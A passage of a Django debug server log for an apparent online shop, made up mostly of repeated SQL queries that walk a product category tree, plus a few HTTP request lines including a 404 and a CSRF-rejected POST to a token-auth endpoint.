"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:28:05,015 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:28:05,019 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:28:05,024 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:28:05,028 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:28:05,033 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:28:05,041 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:28:05,045 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:28:05,050 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:28:05,055 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:28:05,059 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:28:05,062 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:28:05,066 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:28:05,069 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:28:05,071 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:28:05,073 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:28:05,075 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:28:05,079 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:28:05,081 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:28:05,084 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:28:05,087 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:28:05,090 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:28:05,095 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:28:05,098 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:28:05,101 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:28:05,103 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:28:05,106 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:28:05,109 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:28:05,112 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:28:05,114 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:28:05,117 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:28:05,120 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:28:05,123 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:28:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:28:05,614 utils 31843 140533074753280 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'api-token-auth'; args=('api-token-auth',) Not Found: /api-token-auth/ [27/Dec/2019 07:28:05] "GET /api-token-auth/ HTTP/1.0" 404 1747 Forbidden (CSRF cookie not set.): /api-token-auth/ [27/Dec/2019 07:28:15] "POST /api-token-auth/ HTTP/1.0" 403 2868 [27/Dec/2019 07:29:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 07:29:50,130 utils 31843 140533074753280 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:29:50,141 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:29:50,147 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:29:50,150 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:29:50,154 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:29:50,157 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:29:50,159 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:29:50,162 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:29:50,165 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:29:50,169 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:29:50,172 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:29:50,174 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:29:50,177 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:29:50,180 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:29:50,184 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:29:50,187 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:29:50,189 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:29:50,192 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:29:50,196 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:29:50,200 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:29:50,203 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:29:50,205 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:29:50,207 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:29:50,210 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:29:50,212 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:29:50,215 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:29:50,218 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:29:50,220 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:29:50,222 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:29:50,224 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:29:50,229 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:29:50,232 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:29:50,235 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:29:50,237 utils 31843 140533074753280 (0.001) SELECT 